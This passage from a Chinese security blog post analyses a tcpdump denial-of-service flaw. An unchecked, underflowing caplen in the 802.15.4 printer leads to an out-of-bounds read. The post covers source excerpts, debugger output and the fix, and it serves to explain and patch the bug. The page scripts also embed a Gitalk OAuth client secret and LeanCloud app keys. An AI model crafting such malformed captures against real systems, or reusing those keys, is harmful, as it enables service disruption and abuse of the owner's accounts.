< p > pcap_loop通过callback指向print_packet,来看一下它的源码< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. static void< / span > < br > < span class = "line" > 2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)< / span > < br > < span class = "line" > 3. { < / span > < br > < span class = "line" > 4. struct print_info *print_info;< / span > < br > < span class = "line" > 5. u_int hdrlen;< / span > < br > < span class = "line" > 6. ++packets_captured;< / span > < br > < span class = "line" > 7. ++infodelay;< / span > < br > < span class = "line" > 8. ts_print(& h-> ts);< / span > < br > < span class = "line" > 9. print_info = (struct print_info *)user;< / span > < br > < span class = "line" > 10. /*< / span > < br > < span class = "line" > 11. 
* Some printers want to check that they' re not walking off the< / span > < br > < span class = "line" > 12. * end of the packet.< / span > < br > < span class = "line" > 13. * Rather than pass it all the way down, we set this global.< / span > < br > < span class = "line" > 14. */< / span > < br > < span class = "line" > 15. snapend = sp + h-> caplen;< / span > < br > < span class = "line" > 16. if(print_info-> ndo_type) { < / span > < br > < span class = "line" > 17. hdrlen = (*print_info-> p.ndo_printer)(print_info-> ndo, h, sp);< ====< / span > < br > < span class = "line" > 18. } else { < / span > < br > < span class = "line" > 19. hdrlen = (*print_info-> p.printer)(h, sp);< / span > < br > < span class = "line" > 20. } < / span > < br > < span class = "line" > 21. putchar(' n' );< / span > < br > < span class = "line" > 22. --infodelay;< / span > < br > < span class = "line" > 23. if (infoprint)< / span > < br > < span class = "line" > 24. info(0);} < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 同样设置断点看该函数是如何调用执行的< / p >
< p > 这时我们可以根据call指令的信息, 计算出被调用的函数名< / p >
< p > 其中(*print_info-> p.ndo_printer)(print_info-> ndo,h,sp)指向ieee802_15_4_if_print< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / 
span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < span class = "line" > 71< / span > < br > < span class = "line" > 72< / span > < br > < span class = "line" > 73< / span > < br > < span class = "line" > 74< / span > < br > < span class = "line" > 75< / span > < br > < span class = "line" > 76< / span > < br > < span class = "line" > 77< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 25. u_int< / span > < br > < span class = "line" > 26. ieee802_15_4_if_print(struct netdissect_options *ndo,< / span > < br > < span class = "line" > 27. const struct pcap_pkthdr *h, const u_char *p)< / span > < br > < span class = "line" > 28. { < / span > < br > < span class = "line" > 29. printf(" address : %x\n" ,p);< / span > < br > < span class = "line" > 30. 
u_int caplen = h-> caplen; //传入的caplen, 赋值给无符号整形变量caplen,且该值为8< / span > < br > < span class = "line" > 31. int hdrlen;< / span > < br > < span class = "line" > 32. u_int16_t fc;< / span > < br > < span class = "line" > 33. u_int8_t seq;< / span > < br > < span class = "line" > 34. if (caplen < 3) { //不满足< / span > < br > < span class = "line" > 35. ND_PRINT((ndo, " [|802.15.4] %x" , caplen));< / span > < br > < span class = "line" > 36. return caplen;< / span > < br > < span class = "line" > 37. } < / span > < br > < span class = "line" > 38. fc = EXTRACT_LE_16BITS(p);< / span > < br > < span class = "line" > 39. hdrlen = extract_header_length(fc);< / span > < br > < span class = "line" > 40. seq = EXTRACT_LE_8BITS(p + 2);< / span > < br > < span class = "line" > 41. p += 3;< / span > < br > < span class = "line" > 42. caplen -= 3;//此时caplen = 5< / span > < br > < span class = "line" > 43. ND_PRINT((ndo," IEEE 802.15.4 %s packet " , ftypes[fc & 0x7]));< / span > < br > < span class = "line" > 44. if (vflag)< / span > < br > < span class = "line" > 45. ND_PRINT((ndo," seq %02x " , seq));< / span > < br > < span class = "line" > 46. if (hdrlen == -1) { < / span > < br > < span class = "line" > 47. ND_PRINT((ndo," malformed! " ));< / span > < br > < span class = "line" > 48. return caplen;< / span > < br
< p > 传入的第二个值是struct pcap_pkthdr *h结构体, 函数使用的参数caplen就是结构体中的caplen, 不难看出, caplen进行一些加减操作后, 没有判断正负, 直接丢给了下一个函数使用。< br > 直接跟进函数,看看最后赋值情况< / p >
< p > 从源码和调试信息可以看到libpcap在处理不正常包时不严谨, 导致包的头长度hdrlen竟然大于捕获包长度caplen, 并且在处理时又没有相关的判断。caplen是无符号整数(u_int), 与hdrlen相减得到的负值会回绕成一个很大的数, 导致caplen==0xfffffff3过长。< br > 继续跟进hex_and_ascii_print(ndo_default_print)< / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_and_ascii_print(register const char *ident, register const u_char *cp,< / span > < br > < span class = "line" > 3. register u_int length)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. hex_and_ascii_print_with_offset(ident, cp, length, 0);< / span > < br > < span class = "line" > 6. 
} < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > 其中length==0xfffffff3, 继续执行< / span > < br > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,< / span > < br > < span class = "line" > 3. register u_int oset)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. register u_int i, s;< / span > < br > < span class = "line" > 6. register int nshorts;< / span > < br > < span class = "line" > 7.< / span > < br > < span class = "line" > 8. nshorts = (u_int) length / sizeof(u_short);< / span > < br > < span class = "line" > 9. i = 0;< / span > < br > < span class = "line" > 10. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 11. if ((i++ % 8) == 0) { < / span > < br > < span class = "line" > 12. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 13. oset += HEXDUMP_BYTES_PER_LINE;< / span > < br > < span class = "line" > 14. } < / span > < br > < span class = "line" > 15. s = *cp++; < ======= 抛出错误位置< / span > < br > < span class = "line" > 16. (void)printf(" %02x%02x" , s, *cp++);< / span > < br > < span class = "line" > 17. } < / span > < br > < span class = "line" > 18. if (length & 1) { < / span > < br > < span class = "line" > 19. if ((i % 8) == 0)< / span > < br > < span class = "line" > 20. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 21. (void)printf(" %02x" , *cp);< / span > < br > < span class = "line" > 22. } < / span > < br > < span class = "line" > nshorts=(u_int) length / sizeof(u_short) => nshorts=0xfffffff3/2= 7FFFFFF9 < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 但数据包数据没有这么长, 导致了crash。< / p >
< h3 id = "内存分析" > < a href = "#内存分析" class = "headerlink" title = "内存分析" > < / a > 内存分析< / h3 > < p > 仔细分析之后发现, 通过len判断的这个长度并没有进行控制, 如果是自己构造的一个超长len的数据包, 则会连续读取到不可估计的值。< br > 通过查看ebx(即cp)的值来看一下这个内存到底开辟到什么位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ x/10000000x 0x81e33bd< / span > < br > < span class = "line" > 2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x00000000< / span > < br > < span class = "line" > 3. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x00000000< / span > < br > < span class = "line" > 4. 0x8203ffd: Cannot access memory at address 0x8204000< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 可以看到, 到达0x8204000附近的时候, 就是无法读取的无效地址了, 而初始值为0x81e33bd, 用两个值相减: 0x8204000-0x81e33bd = 0x20c40, 因为ebx+ebp*2+0x1一次读取两个字节, 所以循环计数器就要除以2, 最后结果为0x10620。< br > 来看一下到达拒绝服务位置时读取的长度: EBX: 0x81e33bd --> 0x0; EBP: 0x10621; < br > EBP刚好为0x10621, 对应的正是不可读取内存空间的地址, 因此造成拒绝服务。< / p >
< h3 id = "漏洞总结" > < a href = "#漏洞总结" class = "headerlink" title = "漏洞总结" > < / a > 漏洞总结< / h3 > < p > 总结一下整个漏洞触发过程, 首先tcpdump会读取恶意构造的pcap包, 在构造pcap包的时候, 设置一个超长的数据包长度, tcpdump会根据len的长度去读取保存在内存空间数据包的内容, 当引用到不可读取内存位置时, 会由于引用不可读指针, 造成拒绝服务漏洞。< / p >
< h2 id = "漏洞修补" > < a href = "#漏洞修补" class = "headerlink" title = "漏洞修补" > < / a > 漏洞修补< / h2 > < p > Libpcap依然是apt安装的默认版本, tcpdump使用4.7.0-bp版本< br > 在hex_and_ascii_print_with_offset中增加对caplength的判断< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;< / span > < br > < span class = "line" > 2. if (length > caplength)< / span > < br > < span class = "line" > 3. length = caplength;< / span > < br > < span class = "line" > 4. nshorts = length / sizeof(u_short);< / span > < br > < span class = "line" > 5. i = 0;< / span > < br > < span class = "line" > 6. hsp = hexstuff; asp = asciistuff;< / span > < br > < span class = "line" > 7. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 8. ...< / span > < br > < span class = "line" > 9. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 可以看到执行完caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;之后, caplength为0; 继续执行 if (length > caplength) length = caplength; 可知length同样被截断为0, 随后的while循环不会再执行, 到这里已经不会发生越界读取了。< / p >
< h2 id = "参考" > < a href = "#参考" class = "headerlink" title = "参考" > < / a > 参考< / h2 > < p > < a href = "https://www.exploit-db.com/exploits/39875/" target = "_blank" rel = "noopener" > exploit-db payload< / a > < br > < a href = "https://whereisk0shl.top/post/2016-10-23-1" target = "_blank" rel = "noopener" > WHEREISK0SHL分析博客< / a > < br > < a href = "https://github.com/the-tcpdump-group" target = "_blank" rel = "noopener" > libpcap/tcpdump源码< / a > < / p >
< / div >
< div >
< ul class = "post-copyright" >
< li class = "post-copyright-author" >
< strong > 本文作者:< / strong >
Cool-Y
< / li >
< li class = "post-copyright-link" >
< strong > 本文链接:< / strong >
< a href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" title = "TCPDUMP拒绝服务攻击漏洞" > https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/< / a >
< / li >
< li class = "post-copyright-license" >
< strong > 版权声明: < / strong >
本博客所有文章除特别声明外,均采用 < a href = "https://creativecommons.org/licenses/by-nc-sa/3.0/" rel = "external nofollow" target = "_blank" > CC BY-NC-SA 3.0< / a > 许可协议。转载请注明出处!
< / li >
< / ul >
< / div >
< footer class = "post-footer" >
< div class = "post-tags" >
< a href = "/tags/TCPDUMP/" rel = "tag" > # TCPDUMP< / a >
< a href = "/tags/拒绝服务攻击/" rel = "tag" > # 拒绝服务攻击< / a >
< / div >
< / footer >
< / div >
< / article >
< div class = "post-spread" >
< / div >
< / div >
< / div >
< div class = "comments" id = "comments" >
< div id = "gitalk-container" > < / div >
< / div >
< / div >
< / div >
< / main >
< / div >
< script type = "text/javascript" >
// Keep window.Promise only when it is a real function; anything else
// (e.g. an object left behind by a partial polyfill) is nulled out.
// Wrapped in an IIFE so the probe value does not leak into global scope.
(function () {
  var promiseTag = Object.prototype.toString.call(window.Promise);
  if (promiseTag !== '[object Function]') {
    window.Promise = null;
  }
})();
< / script >
< script type = "text/javascript" src = "/lib/jquery/index.js?v=2.1.3" > < / script >
< script type = "text/javascript" src = "/lib/fastclick/lib/fastclick.min.js?v=1.0.6" > < / script >
< script type = "text/javascript" src = "/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.ui.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5" > < / script >
< script type = "text/javascript" src = "/js/src/utils.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/motion.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scrollspy.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/post-details.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/bootstrap.js?v=5.1.4" > < / script >
<!-- LOCAL: You can save these files to your site and update links -->
<!-- NOTE(review): both assets come from unpkg at an unpinned version (no
     @x.y.z in the URL) and carry no integrity/crossorigin attributes, so
     whatever unpkg serves for "gitalk" runs with full page privileges.
     Self-host them as the comment above suggests, or pin a version and
     add Subresource Integrity. -->
< link rel = "stylesheet" href = "https://unpkg.com/gitalk/dist/gitalk.css" >
< script src = "https://unpkg.com/gitalk/dist/gitalk.min.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
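/**
 * Mount the Gitalk comment widget into the #gitalk-container element.
 *
 * Gitalk runs its GitHub OAuth exchange in the browser, so both clientID
 * and clientSecret are necessarily readable by every visitor. Treat that
 * OAuth app as public: keep it dedicated to the comments repository and
 * rotate the secret if it is ever reused for anything else.
 *
 * `id` keys the page to a GitHub issue; the decoded pathname is used so
 * percent-encoded and literal forms of the same URL map to one issue.
 * Gitalk documents a 50-character limit for this value, so very long
 * paths would need to be hashed first.
 *
 * Depends on the global `Gitalk` constructor loaded just above.
 */
function renderGitalk() {
  var gitalk = new Gitalk({
    owner: 'Cool-Y',
    repo: 'gitment-comments',
    clientID: '180955a2c3ae3d966d9a',
    clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
    admin: 'Cool-Y',
    id: decodeURI(location.pathname),
    // Boolean option. The original passed the string 'true', which only
    // worked because any non-empty string is truthy.
    distractionFreeMode: true
  });
  gitalk.render('gitalk-container');
}
renderGitalk();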
< / script >
<!-- NOTE(review): LeanCloud SDK pulled from a third-party CDN with no
     integrity attribute. The App ID / App Key passed to AV.initialize are
     client-side credentials (not the master key) and are readable by every
     visitor, so access control rests entirely on the ACLs of the LeanCloud
     classes -- see the public-write ACL in addCount() below. -->
< script src = "https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js" > < / script >
< script > AV . initialize ( "EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz" , "x8FxDrYG79C8YFrTww9ljo8K" ) ; < / script >
< script >
/**
 * Display stored visit counts for every `.leancloud_visitors` node on the
 * page (the listing-page case: nothing is incremented here).
 *
 * Each node's `id` attribute is the page key; rows are fetched in one
 * query with `url IN ids`, their `time` value is written into the node's
 * `.leancloud-visitors-count`, and any node that received no row (or an
 * empty value) is shown as 0. Query failures are only logged.
 *
 * @param {Function} Counter  AV.Object subclass for the "Counter" class.
 */
function showTime(Counter) {
  var COUNT_SEL = '.leancloud-visitors-count';
  var $nodes = $(".leancloud_visitors");
  // Page keys in DOM order; .trim() throws if a node lacks an id, as before.
  var pageIds = $nodes.map(function () {
    return $(this).attr("id").trim();
  }).get();

  var query = new AV.Query(Counter);
  query.containedIn('url', pageIds);

  function applyResults(results) {
    if (results.length === 0) {
      $nodes.find(COUNT_SEL).text(0);
      return;
    }
    for (var r = 0; r < results.length; r++) {
      var row = results[r];
      var target = document.getElementById(row.get('url'));
      $(target).find(COUNT_SEL).text(row.get('time'));
    }
    // Nodes with no matching row still show an empty count; zero them.
    for (var k = 0; k < pageIds.length; k++) {
      var span = $(document.getElementById(pageIds[k])).find(COUNT_SEL);
      if (span.text() == '') {
        span.text(0);
      }
    }
  }

  function reportError(object, error) {
    console.log("Error: " + error.code + " " + error.message);
  }

  query.find().done(applyResults).fail(reportError);
}
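/**
 * Records one visit for the single post on the current page.
 *
 * Looks up the Counter record whose `url` equals the id of the
 * `.leancloud_visitors` element; increments its `time` field when found,
 * otherwise creates the record with `time` = 1. The resulting count is written
 * into the element's `.leancloud-visitors-count` child.
 *
 * @param {Function} Counter  AV.Object subclass for the "Counter" class
 */
function addCount(Counter) {
  var $visitors = $(".leancloud_visitors");
  var url = $visitors.attr('id').trim();
  var title = $visitors.attr('data-flag-title').trim();

  // show the value the server stored for this page's element
  function displayCount(saved) {
    var $element = $(document.getElementById(url));
    $element.find('.leancloud-visitors-count').text(saved.get('time'));
  }

  // existing record: increment its `time` field and save
  function incrementExisting(counter) {
    counter.fetchWhenSave(true);
    counter.increment("time");
    counter.save(null, {
      success: displayCount,
      error: function (counter, error) {
        console.log('Failed to save Visitor num, with error message: ' + error.message);
      }
    });
  }

  // first visit: create the record for this page
  function createNew() {
    var newcounter = new Counter();
    /* Set ACL */
    // NOTE(review): public write lets any client rewrite every field of this
    // record, so the displayed numbers are not tamper-proof. The browser does
    // need write access to increment; narrowing it via class-level
    // permissions in the LeanCloud console would be safer than a per-object
    // public-write ACL — confirm against the console settings.
    var acl = new AV.ACL();
    acl.setPublicReadAccess(true);
    acl.setPublicWriteAccess(true);
    newcounter.setACL(acl);
    /* End Set ACL */
    newcounter.set("title", title);
    newcounter.set("url", url);
    newcounter.set("time", 1);
    newcounter.save(null, {
      success: displayCount,
      error: function (newcounter, error) {
        // include the server's message, like the other error handlers do
        console.log('Failed to create Visitor num, with error message: ' + error.message);
      }
    });
  }

  var query = new AV.Query(Counter);
  query.equalTo("url", url);
  query.find({
    success: function (results) {
      if (results.length > 0) {
        incrementExisting(results[0]);
      } else {
        createNew();
      }
    },
    error: function (error) {
      console.log('Error:' + error.code + " " + error.message);
    }
  });
}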
// Entry point once the DOM is ready: exactly one counter element means a
// post page (record the visit); several post links mean a list page
// (only display the stored counts).
$(function () {
  var Counter = AV.Object.extend("Counter");
  var isSinglePost = $('.leancloud_visitors').length == 1;
  if (isSinglePost) {
    addCount(Counter);
    return;
  }
  if ($('.post-title-link').length > 1) {
    showTime(Counter);
  }
});
< / script >
< script >
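// Baidu site-submit beacon: inject push.js in front of the first <script>.
// The script is always fetched over HTTPS. The original switched to
// http://push.zhanzhang.baidu.com on plain-http pages, which exposes the
// injected script to on-path tampering; an https URL loads fine from an
// http page as well, and this site is published over https (see og:url).
(function () {
  var bp = document.createElement('script');
  bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  var first = document.getElementsByTagName("script")[0];
  first.parentNode.insertBefore(bp, first);
})();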
< / script >
< link rel = "stylesheet" href = "/lib/needsharebutton/needsharebutton.css" >
< script src = "/lib/needsharebutton/needsharebutton.js" > < / script >
< script >
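// Share buttons (needsharebutton): one bar under the post, one floating at
// the right edge, both offering the same networks.
// Declared with `var` instead of relying on implicit (sloppy-mode) globals;
// the window.pbOptions / window.flOptions names remain available as before.
var pbOptions = {
  iconStyle: "box",
  boxForm: "horizontal",
  position: "bottomCenter",
  networks: "Weibo,Wechat,Douban,QQZone,Twitter,Facebook"
};
new needShareButton('#needsharebutton-postbottom', pbOptions);

var flOptions = {
  iconStyle: "box",
  boxForm: "horizontal",
  position: "middleRight",
  networks: "Weibo,Wechat,Douban,QQZone,Twitter,Facebook"
};
new needShareButton('#needsharebutton-float', flOptions);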
< / script >
< script type = "text/javascript" src = "/js/src/js.cookie.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scroll-cookie.js?v=5.1.4" > < / script >
< / body >
< / html >